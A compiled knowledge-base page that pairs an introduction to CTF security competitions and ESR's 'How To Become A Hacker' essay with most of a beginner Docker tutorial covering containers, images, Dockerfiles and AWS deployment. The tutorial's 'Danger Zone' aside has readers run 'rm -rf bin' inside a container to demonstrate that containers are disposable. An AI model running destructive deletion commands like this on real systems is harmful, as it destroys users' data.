About this knowledge base
CTF 101
CTF Introduction
Capture The Flags, or CTFs, is a kind of computer security competition.
Teams of competitors (or just individuals) are pitted against each other in a test of computer security skills.
Very often CTFs are the beginning of one's cyber security career due to their team-building nature and competitive aspect. In addition, there isn't a lot of commitment required beyond a weekend.
Origin of CTF
CTF's predecessor is a traditional networking technology competition between hackers, which originated at the 4th DEFCON in 1996.
Early CTF Competitions
The first CTF competitions (1996 - 2001) had no clear rules and no professionally built competition platform and environment. It was up to the teams to prepare their own targets (prepare and defend their own targets, and try to break each other's targets). The organizers are mostly just non-professional volunteers who accept requests for manual scoring from the participating teams.
The lack of automated back-end systems and judges' technical competence, scoring delays and errors, as well as unreliable networks and improper configurations, led to a great deal of controversy and dissatisfaction.
The "Modern" CTF Competition
A professional team undertakes the competition platform, proposition, event organization, and automated point system. Teams are required to submit applications and are selected by the DEFCON conference organizers.
The following features stand out for the three years of DEFCON CTF competitions organized by LegitBS.
The competition focuses on core competencies in underlying computer and system security, and web vulnerability techniques are completely ignored. The competition environment tends to be a multi-CPU instruction architecture set, multi-operating system, and multi-programming language. Zero-sum" scoring rules are used. The team's comprehensive ability test: reverse analysis, vulnerability mining, vulnerability exploitation, vulnerability patching and reinforcement, network traffic analysis, system security operation and maintenance, and security programming debugging.
CTF Competition Types
Jeopardy is commonly used in online selection competitions. In Jeopardy CTF, teams can participate via the Internet or a live network, where they solve technical challenges in cybersecurity by interacting with the online environment or analyzing files offline to earn points, similar to ACM programming competitions and informatics Olympiads, and are ranked based on total points and time.
The different problem-solving problem-solving modes will generally set the first blood, and second blood, third blood, that is, the first three teams to complete the problem will get extra points, so this is not only the first team to solve the problem to encourage the value of the team, but also an indirect reflection of the team's ability.
Of course there is also a popular scoring rule that sets the initial score for each question and then gradually reduces the score of the question according to the number of teams that have successfully answered the question, meaning that the more people answer the question, the lower the score of the question will be. Eventually it will drop to a guaranteed score and then stop dropping.
The main types of questions include Web network attack and defense, RE reverse engineering, Pwn binary exploit, Crypto cryptographic attacks, Mobile mobile security, and Misc security miscellaneous six categories.
CTF Contest Contents
Since the CTF has a wide range of questions, there are no clear boundaries as to what will be tested. However, as far as the current competition questions are concerned, they are mainly classified according to the common Web network attack and defense, RE reverse engineering, Pwn binary vulnerability exploitation, Crypto cryptography attack, Mobile security, and Misc security.
Web - Web Attack and Defense
Mainly introduces the common vulnerabilities in Web security, such as SQL injection, XSS, CSRF, file inclusion, file upload, code audit, PHP weak types, etc., common questions and solutions in Web security, and provides some common tools.
Reverse Engineering - Reverse Engineering
Mainly introduces the common question types, tools platform, and solution ideas in Reverse Engineering, and the advanced part introduces the common software protection, decompiling, anti-debugging, shelling, and deshelling techniques in Reverse Engineering.
Pwn - binary vulnerability exploitation
The Pwn topic mainly examines the discovery and exploitation of binary vulnerabilities, which requires a certain understanding of the underlying computer operating system. PWN topics are mainly found on the Linux platform in the CTF competition.
Crypto - Cryptographic Attacks
Classical cryptography is interesting and diverse, while modern cryptography is highly secure and requires high algorithmic understanding.
Mobile - Mobile Security
Mainly introduces the common tools and main problem types in Android inversion. Android inversion often requires certain knowledge of Android development. iOS inversion topics are less frequent in CTF competitions, so not too much introduction is made.
Misc - Security Miscellaneous
The topic "Online Ghost: The Autobiography of Mitnick, the World's Number One Hacker" translated by Zhuge Jianwei, and some typical MISC topics are used as entry points, mainly including information gathering, coding analysis, forensic analysis, steganography analysis, etc.
How To Become A Hacker
What Is a Hacker?
The Jargon File contains a bunch of definitions of the term ‘hacker’, most having to do with technical adeptness and a delight in solving problems and overcoming limits. If you want to know how to become a hacker, though, only two are relevant.
There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term ‘hacker’. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you're a hacker.
The hacker mindset is not confined to this software-hacker culture. Some people apply the hacker attitude to other things, like electronics or music — actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them ‘hackers’ too — and some claim that the hacker nature is independent of the particular medium the hacker works in. But in the rest of this document, we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term ‘hacker’.
There is another group of people who loudly call themselves hackers, but aren't. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people ‘crackers’ and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word ‘hacker’ to describe crackers; this irritates real hackers no end.
The basic difference is this: hackers build things, and crackers break them.
If you want to be a hacker, keep reading. If you want to be a cracker, go read the alt.2600 newsgroup and get ready to do five to ten in the slammer after finding out you aren't as smart as you think you are. And that's all I'm going to say about crackers.
The Hacker Attitude
-
- The world is full of fascinating problems waiting to be solved.
-
- No problem should ever have to be solved twice.
-
- Boredom and drudgery are evil.
-
- Freedom is good.
-
- Attitude is no substitute for competence.
Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.
But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. Becoming the kind of person who believes these things are important for you — for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mindset of masters — not just intellectually but emotionally as well.
Or, as the following modern Zen poem has it:
To follow the path: look to the master, follow the master, walk with the master, see through the master, become the master.
So, if you want to be a hacker, repeat the following things until you believe them:
1. The world is full of fascinating problems waiting to be solved.
Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, and in pushing themselves past their physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence.
If you aren't the kind of person that feels this way naturally, you'll need to become one to make it as a hacker. Otherwise, you'll find your hacking energy is sapped by distractions like sex, money, and social approval.
(You also have to develop a kind of faith in your own learning capacity — a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece — and so on, until you're done.)
2. No problem should ever have to be solved twice.
Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there.
To behave like a hacker, you have to believe that the thinking time of other hackers is precious — so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.
Note, however, that "No problem should ever have to be solved twice." does not imply that you have to consider all existing solutions sacred, or that there is only one right solution to any given problem. Often, we learn a lot about the problem that we didn't know before by studying the first cut at a solution. It's OK, and often necessary, to decide that we can do better. What's not OK is artificial technical, legal, or institutional barriers (like closed-source code) that prevent a good solution from being re-used and force people to re-invent wheels.
(You don't have to believe that you're obligated to give all your creative product away, though the hackers that do are the ones that get the most respect from other hackers. It's consistent with hacker values to sell enough of it to keep you in food and rent and computers. It's fine to use your hacking skills to support a family or even get rich, as long as you don't forget your loyalty to your art and your fellow hackers while doing it.)
3. Boredom and drudgery are evil.
Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work because when this happens it means they aren't doing what only they can do — solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but evil.
To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers).
(There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice — nobody who can think should ever be forced into a situation that bores them.)
4. Freedom is good.
Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by — and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smothers you and other hackers.
(This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kind of authority to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.)
Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing — they only like the ‘cooperation’ that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.
5. Attitude is no substitute for competence.
To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work.
Therefore, you have to learn to distrust attitudes and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence — especially competence at hacking, but competence at anything is valued. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best.
If you revere competence, you'll enjoy developing it in yourself — the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker.
Reference
- https://ctf101.org/
- http://www.catb.org/~esr/faqs/hacker-howto.html
- https://ctf-wiki.org/
Docker for beginners
https://docker-curriculum.com/
by Prakhar Srivastav
Introduction
What is Docker?
Wikipedia defines Docker as
an open-source project that automates the deployment of software applications inside containers by providing an additional layer of abstraction and automation of OS-level virtualization on Linux.
Wow! That's a mouthful. In simpler words, Docker is a tool that allows developers, sys-admins, etc. to easily deploy their applications in a sandbox (called containers) to run on the host operating system i.e. Linux. The key benefit of Docker is that it allows users to package an application with all of its dependencies into a standardized unit for software development. Unlike virtual machines, containers do not have high overhead and hence enable more efficient usage of the underlying system and resources.
What are containers?
The industry standard today is to use Virtual Machines (VMs) to run software applications. VMs run applications inside a guest Operating System, which runs on virtual hardware powered by the server’s host OS.
VMs are great at providing full process isolation for applications: there are very few ways a problem in the host operating system can affect the software running in the guest operating system, and vice-versa. But this isolation comes at a great cost — the computational overhead spent virtualizing hardware for a guest OS to use is substantial.
Containers take a different approach: by leveraging the low-level mechanics of the host operating system, containers provide most of the isolation of virtual machines at a fraction of the computing power.
Why use containers?
Containers offer a logical packaging mechanism in which applications can be abstracted from the environment in which they run. This decoupling allows container-based applications to be deployed easily and consistently, regardless of whether the target environment is a private data center, the public cloud, or even a developer’s laptop. This gives developers the ability to create predictable environments that are isolated from the rest of the applications and can be run anywhere.
From an operations standpoint, apart from portability containers also give more granular control over resources giving your infrastructure improved efficiency which can result in better utilization of your compute resources.
Google Trends for Docker
Due to these benefits, containers (& Docker) have seen widespread adoption. Companies like Google, Facebook, Netflix, and Salesforce leverage containers to make large engineering teams more productive and to improve the utilization of computing resources. Google credited containers for eliminating the need for an entire data center.
What will this tutorial teach me?
This tutorial aims to be the one-stop shop for getting your hands dirty with Docker. Apart from demystifying the Docker landscape, it'll give you hands-on experience building and deploying your web apps on the Cloud. We'll be using Amazon Web Services to deploy a static website, and two dynamic web apps on EC2 using Elastic Beanstalk and Elastic Container Service. Even if you have no prior experience with deployments, this tutorial should be all you need to get started.
GETTING STARTED
This document contains a series of several sections, each of which explains a particular aspect of Docker. We will be typing commands (or writing code) in each section. All the code used in the tutorial is available in the GitHub repo.
Note: This tutorial uses version 18.05.0-ce of Docker. If you find any part of the tutorial incompatible with a future version, please raise an issue. Thanks!
Prerequisites
There are no specific skills needed for this tutorial beyond a basic comfort with the command line and using a text editor. This tutorial uses git clone
to clone the repository locally. If you don't have Git installed on your system, either install it or remember to manually download the zip files from Github. Prior experience in developing web applications will be helpful but is not required. As we proceed further along the tutorial, we'll make use of a few cloud services. If you're interested in following along, please create an account on each of these websites:
Setting up your computer
Getting all the tooling setup on your computer can be a daunting task, but thankfully as Docker has become stable, getting Docker up and running on your favorite OS has become very easy.
Until a few releases ago, running Docker on OSX and Windows was quite a hassle. Lately however, Docker has invested significantly into improving the on-boarding experience for its users on these OSes, thus running Docker now is a cakewalk. The getting started guide on Docker has detailed instructions for setting up Docker on Mac, Linux and Windows.
Once you are done installing Docker, test your Docker installation by running the following:
$ docker run hello-world
Hello from Docker.
This message shows that your installation appears to be working correctly.
...
HELLO WORLD
Playing with Busybox
Now that we have everything setup, it's time to get our hands dirty. In this section, we are going to run a Busybox container on our system and get a taste of the docker run
command.
To get started, let's run the following in our terminal:
$ docker pull busybox
Note: Depending on how you've installed docker on your system, you might see a
permission denied
error after running the above command. If you're on a Mac, make sure the Docker engine is running. If you're on Linux, then prefix yourdocker
commands withsudo
. Alternatively, you can create a docker group to get rid of this issue.
The pull
command fetches the busybox image from the Docker registry and saves it to our system. You can use the docker images
command to see a list of all images on your system.
$ docker images
REPOSITORY TAG IMAGE ID CREATED VIRTUAL SIZE
busybox latest c51f86c28340 4 weeks ago 1.109 MB
Docker Run
Great! Let's now run a Docker container based on this image. To do that we are going to use the almighty docker run
command.
$ docker run busybox
Wait, nothing happened! Is that a bug? Well, no. Behind the scenes, a lot of stuff happened. When you call run
, the Docker client finds the image (busybox in this case), loads up the container and then runs a command in that container. When we run docker run busybox
, we didn't provide a command, so the container booted up, ran an empty command and then exited. Well, yeah - kind of a bummer. Let's try something more exciting.
$ docker run busybox echo "hello from busybox"
hello from busybox
Nice - finally we see some output. In this case, the Docker client dutifully ran the echo
command in our busybox container and then exited it. If you've noticed, all of that happened pretty quickly. Imagine booting up a virtual machine, running a command and then killing it. Now you know why they say containers are fast! Ok, now it's time to see the docker ps
command. The docker ps
command shows you all containers that are currently running.
$ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
Since no containers are running, we see a blank line. Let's try a more useful variant: docker ps -a
$ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
305297d7a235 busybox "uptime" 11 minutes ago Exited (0) 11 minutes ago distracted_goldstine
ff0a5c3750b9 busybox "sh" 12 minutes ago Exited (0) 12 minutes ago elated_ramanujan
14e5bd11d164 hello-world "/hello" 2 minutes ago Exited (0) 2 minutes ago thirsty_euclid
So what we see above is a list of all containers that we ran. Do notice that the STATUS
column shows that these containers exited a few minutes ago.
You're probably wondering if there is a way to run more than just one command in a container. Let's try that now:
$ docker run -it busybox sh
/ # ls
bin dev etc home proc root sys tmp usr var
/ # uptime
05:45:21 up 5:58, 0 users, load average: 0.00, 0.01, 0.04
Running the run
command with the -it
flags attaches us to an interactive tty in the container. Now we can run as many commands in the container as we want. Take some time to run your favorite commands.
Danger Zone: If you're feeling particularly adventurous you can try
rm -rf bin
in the container. Make sure you run this command in the container and not in your laptop/desktop. Doing this will make any other commands likels
,uptime
not work. Once everything stops working, you can exit the container (typeexit
and press Enter) and then start it up again with thedocker run -it busybox sh
command. Since Docker creates a new container every time, everything should start working again.
That concludes a whirlwind tour of the mighty docker run
command, which would most likely be the command you'll use most often. It makes sense to spend some time getting comfortable with it. To find out more about run
, use docker run --help
to see a list of all flags it supports. As we proceed further, we'll see a few more variants of docker run
.
Before we move ahead though, let's quickly talk about deleting containers. We saw above that we can still see remnants of the container even after we've exited by running docker ps -a
. Throughout this tutorial, you'll run docker run
multiple times and leaving stray containers will eat up disk space. Hence, as a rule of thumb, I clean up containers once I'm done with them. To do that, you can run the docker rm
command. Just copy the container IDs from above and paste them alongside the command.
$ docker rm 305297d7a235 ff0a5c3750b9
305297d7a235
ff0a5c3750b9
On deletion, you should see the IDs echoed back to you. If you have a bunch of containers to delete in one go, copy-pasting IDs can be tedious. In that case, you can simply run -
$ docker rm $(docker ps -a -q -f status=exited)
This command deletes all containers that have a status of exited
. In case you're wondering, the -q
flag, only returns the numeric IDs and -f
filters output based on conditions provided. One last thing that'll be useful is the --rm
flag that can be passed to docker run
which automatically deletes the container once it's exited from. For one off docker runs, --rm
flag is very useful.
In later versions of Docker, the docker container prune
command can be used to achieve the same effect.
$ docker container prune
WARNING! This will remove all stopped containers.
Are you sure you want to continue? [y/N] y
Deleted Containers:
4a7f7eebae0f63178aff7eb0aa39f0627a203ab2df258c1a00b456cf20063
f98f9c2aa1eaf727e4ec9c0283bcaa4762fbdba7f26191f26c97f64090360
Total reclaimed space: 212 B
Lastly, you can also delete images that you no longer need by running docker rmi
.
Terminology
In the last section, we used a lot of Docker-specific jargon which might be confusing to some. So before we go further, let me clarify some terminology that is used frequently in the Docker ecosystem.
- Images - The blueprints of our application which form the basis of containers. In the demo above, we used the
docker pull
command to download the busybox image. - Containers - Created from Docker images and run the actual application. We create a container using
docker run
which we did using the busybox image that we downloaded. A list of running containers can be seen using thedocker ps
command. - Docker Daemon - The background service running on the host that manages building, running and distributing Docker containers. The daemon is the process that runs in the operating system which clients talk to.
- Docker Client - The command line tool that allows the user to interact with the daemon. More generally, there can be other forms of clients too - such as Kitematic which provide a GUI to the users.
- Docker Hub - A registry of Docker images. You can think of the registry as a directory of all available Docker images. If required, one can host their own Docker registries and can use them for pulling images.
WEBAPPS WITH DOCKER
Great! So we have now looked at docker run
, played with a Docker container and also got a hang of some terminology. Armed with all this knowledge, we are now ready to get to the real-stuff, i.e. deploying web applications with Docker!
Static Sites
Let's start by taking baby-steps. The first thing we're going to look at is how we can run a dead-simple static website. We're going to pull a Docker image from Docker Hub, run the container and see how easy it is to run a webserver.
Let's begin. The image that we are going to use is a single-page website that I've already created for the purpose of this demo and hosted on the registry - prakhar1989/static-site
. We can download and run the image directly in one go using docker run
. As noted above, the --rm
flag automatically removes the container when it exits and the -it
flag specifies an interactive terminal which makes it easier to kill the container with Ctrl+C (on windows).
$ docker run --rm -it prakhar1989/static-site
Since the image doesn't exist locally, the client will first fetch the image from the registry and then run the image. If all goes well, you should see a Nginx is running...
message in your terminal. Okay now that the server is running, how to see the website? What port is it running on? And more importantly, how do we access the container directly from our host machine? Hit Ctrl+C to stop the container.
Well, in this case, the client is not exposing any ports so we need to re-run the docker run
command to publish ports. While we're at it, we should also find a way so that our terminal is not attached to the running container. This way, you can happily close your terminal and keep the container running. This is called detached mode.
$ docker run -d -P --name static-site prakhar1989/static-site
e61d12292d69556eabe2a44c16cbd54486b2527e2ce4f95438e504afb7b02810
In the above command, -d
will detach our terminal, -P
will publish all exposed ports to random ports and finally --name
corresponds to a name we want to give. Now we can see the ports by running the docker port [CONTAINER]
command
$ docker port static-site
80/tcp -> 0.0.0.0:32769
443/tcp -> 0.0.0.0:32768
You can open http://localhost:32769 in your browser.
Note: If you're using docker-toolbox, then you might need to use
docker-machine ip default
to get the IP.
You can also specify a custom port to which the client will forward connections to the container.
$ docker run -p 8888:80 prakhar1989/static-site
Nginx is running...
To stop a detached container, run docker stop
by giving the container ID. In this case, we can use the name static-site
we used to start the container.
$ docker stop static-site
static-site
I'm sure you agree that was super simple. To deploy this on a real server you would just need to install Docker, and run the above Docker command. Now that you've seen how to run a webserver inside a Docker image, you must be wondering - how do I create my own Docker image? This is the question we'll be exploring in the next section.
Docker Images
We've looked at images before, but in this section we'll dive deeper into what Docker images are and build our own image! Lastly, we'll also use that image to run our application locally and finally deploy on AWS to share it with our friends! Excited? Great! Let's get started.
Docker images are the basis of containers. In the previous example, we pulled the Busybox image from the registry and asked the Docker client to run a container based on that image. To see the list of images that are available locally, use the docker images
command.
$ docker images
REPOSITORY TAG IMAGE ID CREATED VIRTUAL SIZE
prakhar1989/catnip latest c7ffb5626a50 2 hours ago 697.9 MB
prakhar1989/static-site latest b270625a1631 21 hours ago 133.9 MB
python 3-onbuild cf4002b2c383 5 days ago 688.8 MB
martin/docker-cleanup-volumes latest b42990daaca2 7 weeks ago 22.14 MB
ubuntu latest e9ae3c220b23 7 weeks ago 187.9 MB
busybox latest c51f86c28340 9 weeks ago 1.109 MB
hello-world latest 0a6ba66e537a 11 weeks ago 960 B
The above gives a list of images that I've pulled from the registry, along with ones that I've created myself (we'll shortly see how). The TAG
refers to a particular snapshot of the image and the IMAGE ID
is the corresponding unique identifier for that image.
For simplicity, you can think of an image akin to a git repository - images can be committed with changes and have multiple versions. If you don't provide a specific version number, the client defaults to latest
. For example, you can pull a specific version of ubuntu
image
$ docker pull ubuntu:18.04
To get a new Docker image you can either get it from a registry (such as the Docker Hub) or create your own. There are tens of thousands of images available on Docker Hub. You can also search for images directly from the command line using docker search
.
An important distinction to be aware of when it comes to images is the difference between base and child images.
- Base images are images that have no parent image, usually images with an OS like ubuntu, busybox or debian.
- Child images are images that build on base images and add additional functionality.
Then there are official and user images, which can be both base and child images.
- Official images are images that are officially maintained and supported by the folks at Docker. These are typically one word long. In the list of images above, the
python
,ubuntu
,busybox
andhello-world
images are official images. - User images are images created and shared by users like you and me. They build on base images and add additional functionality. Typically, these are formatted as
user/image-name
.
Our First Image
Now that we have a better understanding of images, it's time to create our own. Our goal in this section will be to create an image that sandboxes a simple Flask application. For the purposes of this workshop, I've already created a fun little Flask app that displays a random cat .gif
every time it is loaded - because you know, who doesn't like cats? If you haven't already, please go ahead and clone the repository locally like so -
$ git clone https://github.com/prakhar1989/docker-curriculum.git
$ cd docker-curriculum/flask-app
This should be cloned on the machine where you are running the docker commands and not inside a docker container.
The next step now is to create an image with this web app. As mentioned above, all user images are based on a base image. Since our application is written in Python, the base image we're going to use will be Python 3.
Dockerfile
A Dockerfile is a simple text file that contains a list of commands that the Docker client calls while creating an image. It's a simple way to automate the image creation process. The best part is that the commands you write in a Dockerfile are almost identical to their equivalent Linux commands. This means you don't really have to learn new syntax to create your own dockerfiles.
The application directory does contain a Dockerfile but since we're doing this for the first time, we'll create one from scratch. To start, create a new blank file in our favorite text-editor and save it in the same folder as the flask app by the name of Dockerfile
.
We start with specifying our base image. Use the FROM
keyword to do that -
FROM python:3.8
The next step usually is to write the commands of copying the files and installing the dependencies. First, we set a working directory and then copy all the files for our app.
# set a directory for the app
WORKDIR /usr/src/app
# copy all the files to the container
COPY . .
Now, that we have the files, we can install the dependencies.
# install dependencies
RUN pip install --no-cache-dir -r requirements.txt
The next thing we need to specify is the port number that needs to be exposed. Since our flask app is running on port 5000
, that's what we'll indicate.
EXPOSE 5000
The last step is to write the command for running the application, which is simply - python ./app.py
. We use the CMD command to do that -
CMD ["python", "./app.py"]
The primary purpose of CMD
is to tell the container which command it should run when it is started. With that, our Dockerfile
is now ready. This is how it looks -
FROM python:3.8
# set a directory for the app
WORKDIR /usr/src/app
# copy all the files to the container
COPY . .
# install dependencies
RUN pip install --no-cache-dir -r requirements.txt
# define the port number the container should expose
EXPOSE 5000
# run the command
CMD ["python", "./app.py"]
Now that we have our Dockerfile
, we can build our image. The docker build
command does the heavy-lifting of creating a Docker image from a Dockerfile
.
The section below shows you the output of running the same. Before you run the command yourself (don't forget the period), make sure to replace my username with yours. This username should be the same one you created when you registered on Docker hub. If you haven't done that yet, please go ahead and create an account. The docker build
command is quite simple - it takes an optional tag name with -t
and a location of the directory containing the Dockerfile
.
$ docker build -t yourusername/catnip .
Sending build context to Docker daemon 8.704 kB
Step 1 : FROM python:3.8
# Executing 3 build triggers...
Step 1 : COPY requirements.txt /usr/src/app/
---> Using cache
Step 1 : RUN pip install --no-cache-dir -r requirements.txt
---> Using cache
Step 1 : COPY . /usr/src/app
---> 1d61f639ef9e
Removing intermediate container 4de6ddf5528c
Step 2 : EXPOSE 5000
---> Running in 12cfcf6d67ee
---> f423c2f179d1
Removing intermediate container 12cfcf6d67ee
Step 3 : CMD python ./app.py
---> Running in f01401a5ace9
---> 13e87ed1fbc2
Removing intermediate container f01401a5ace9
Successfully built 13e87ed1fbc2
If you don't have the python:3.8
image, the client will first pull the image and then create your image. Hence, your output from running the command will look different from mine. If everything went well, your image should be ready! Run docker images
and see if your image shows.
The last step in this section is to run the image and see if it actually works (replacing my username with yours).
$ docker run -p 8888:5000 yourusername/catnip
* Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)
The command we just ran used port 5000 for the server inside the container and exposed this externally on port 8888. Head over to the URL with port 8888, where your app should be live.
Congratulations! You have successfully created your first docker image.
Docker on AWS
What good is an application that can't be shared with friends, right? So in this section we are going to see how we can deploy our awesome application to the cloud so that we can share it with our friends! We're going to use AWS Elastic Beanstalk to get our application up and running in a few clicks. We'll also see how easy it is to make our application scalable and manageable with Beanstalk!
Docker push
The first thing that we need to do before we deploy our app to AWS is to publish our image on a registry which can be accessed by AWS. There are many different Docker registries you can use (you can even host your own). For now, let's use Docker Hub to publish the image.
If this is the first time you are pushing an image, the client will ask you to login. Provide the same credentials that you used for logging into Docker Hub.
$ docker login
Login in with your Docker ID to push and pull images from Docker Hub. If you do not have a Docker ID, head over to https://hub.docker.com to create one.
Username: yourusername
Password:
WARNING! Your password will be stored unencrypted in /Users/yourusername/.docker/config.json
Configure a credential helper to remove this warning. See
https://docs.docker.com/engine/reference/commandline/login/credential-store
Login Succeeded
To publish, just type the below command remembering to replace the name of the image tag above with yours. It is important to have the format of yourusername/image_name
so that the client knows where to publish.
$ docker push yourusername/catnip
Once that is done, you can view your image on Docker Hub. For example, here's the web page for my image.
Note: One thing that I'd like to clarify before we go ahead is that it is not imperative to host your image on a public registry (or any registry) in order to deploy to AWS. In case you're writing code for the next million-dollar unicorn startup you can totally skip this step. The reason why we're pushing our images publicly is that it makes deployment super simple by skipping a few intermediate configuration steps.
Now that your image is online, anyone who has docker installed can play with your app by typing just a single command.
$ docker run -p 8888:5000 yourusername/catnip
If you've pulled your hair out in setting up local dev environments / sharing application configuration in the past, you very well know how awesome this sounds. That's why Docker is so cool!
Beanstalk
AWS Elastic Beanstalk (EB) is a PaaS (Platform as a Service) offered by AWS. If you've used Heroku, Google App Engine etc. you'll feel right at home. As a developer, you just tell EB how to run your app and it takes care of the rest - including scaling, monitoring and even updates. In April 2014, EB added support for running single-container Docker deployments which is what we'll use to deploy our app. Although EB has a very intuitive CLI, it does require some setup, and to keep things simple we'll use the web UI to launch our application.
To follow along, you need a functioning AWS account. If you haven't already, please go ahead and do that now - you will need to enter your credit card information. But don't worry, it's free and anything we do in this tutorial will also be free! Let's get started.
Here are the steps:
- Login to your AWS console.
- Click on Elastic Beanstalk. It will be in the compute section on the top left. Alternatively, you can access the Elastic Beanstalk console.
- Click on "Create New Application" in the top right
- Give your app a memorable (but unique) name and provide an (optional) description
- In the New Environment screen, create a new environment and choose the Web Server Environment.
- Fill in the environment information by choosing a domain. This URL is what you'll share with your friends so make sure it's easy to remember.
- Under base configuration section. Choose Docker from the predefined platform.
- Now we need to upload our application code. But since our application is packaged in a Docker container, we just need to tell EB about our container. Open the
Dockerrun.aws.json
file located in theflask-app
folder and edit theName
of the image to your image's name. Don't worry, I'll explain the contents of the file shortly. When you are done, click on the radio button for "Upload your Code", choose this file, and click on "Upload". - Now click on "Create environment". The final screen that you see will have a few spinners indicating that your environment is being set up. It typically takes around 5 minutes for the first-time setup.
While we wait, let's quickly see what the Dockerrun.aws.json
file contains. This file is basically an AWS specific file that tells EB details about our application and docker configuration.
{
"AWSEBDockerrunVersion": "1",
"Image": {
"Name": "prakhar1989/catnip",
"Update": "true"
},
"Ports": [
{
"ContainerPort": 5000,
"HostPort": 8000
}
],
"Logging": "/var/log/nginx"
}
The file should be pretty self-explanatory, but you can always reference the official documentation for more information. We provide the name of the image that EB should use along with a port that the container should open.
Hopefully by now, our instance should be ready. Head over to the EB page and you should see a green tick indicating that your app is alive and kicking.
Go ahead and open the URL in your browser and you should see the application in all its glory. Feel free to email / IM / snapchat this link to your friends and family so that they can enjoy a few cat gifs, too.
Cleanup
Once you done basking in the glory of your app, remember to terminate the environment so that you don't end up getting charged for extra resources.
Congratulations! You have deployed your first Docker application! That might seem like a lot of steps, but with the command-line tool for EB you can almost mimic the functionality of Heroku in a few keystrokes! Hopefully, you agree that Docker takes away a lot of the pains of building and deploying applications in the cloud. I would encourage you to read the AWS documentation on single-container Docker environments to get an idea of what features exist.
In the next (and final) part of the tutorial, we'll up the ante a bit and deploy an application that mimics the real-world more closely; an app with a persistent back-end storage tier. Let's get straight to it!
MULTI-CONTAINER ENVIRONMENTS
In the last section, we saw how easy and fun it is to run applications with Docker. We started with a simple static website and then tried a Flask app. Both of which we could run locally and in the cloud with just a few commands. One thing both these apps had in common was that they were running in a single container.
Those of you who have experience running services in production know that usually apps nowadays are not that simple. There's almost always a database (or any other kind of persistent storage) involved. Systems such as Redis and Memcached have become de rigueur of most web application architectures. Hence, in this section we are going to spend some time learning how to Dockerize applications which rely on different services to run.
In particular, we are going to see how we can run and manage multi-container docker environments. Why multi-container you might ask? Well, one of the key points of Docker is the way it provides isolation. The idea of bundling a process with its dependencies in a sandbox (called containers) is what makes this so powerful.
Just like it's a good strategy to decouple your application tiers, it is wise to keep containers for each of the services separate. Each tier is likely to have different resource needs and those needs might grow at different rates. By separating the tiers into different containers, we can compose each tier using the most appropriate instance type based on different resource needs. This also plays in very well with the whole microservices movement which is one of the main reasons why Docker (or any other container technology) is at the forefront of modern microservices architectures.
SF Food Trucks
The app that we're going to Dockerize is called SF Food Trucks. My goal in building this app was to have something that is useful (in that it resembles a real-world application), relies on at least one service, but is not too complex for the purpose of this tutorial. This is what I came up with.
The app's backend is written in Python (Flask) and for search it uses Elasticsearch. Like everything else in this tutorial, the entire source is available on Github. We'll use this as our candidate application for learning out how to build, run and deploy a multi-container environment.
First up, let's clone the repository locally.
$ git clone https://github.com/prakhar1989/FoodTrucks
$ cd FoodTrucks
$ tree -L 2
.
├── Dockerfile
├── README.md
├── aws-compose.yml
├── docker-compose.yml
├── flask-app
│ ├── app.py
│ ├── package-lock.json
│ ├── package.json
│ ├── requirements.txt
│ ├── static
│ ├── templates
│ └── webpack.config.js
├── setup-aws-ecs.sh
├── setup-docker.sh
├── shot.png
└── utils
├── generate_geojson.py
└── trucks.geojson
The flask-app
folder contains the Python application, while the utils
folder has some utilities to load the data into Elasticsearch. The directory also contains some YAML files and a Dockerfile, all of which we'll see in greater detail as we progress through this tutorial. If you are curious, feel free to take a look at the files.
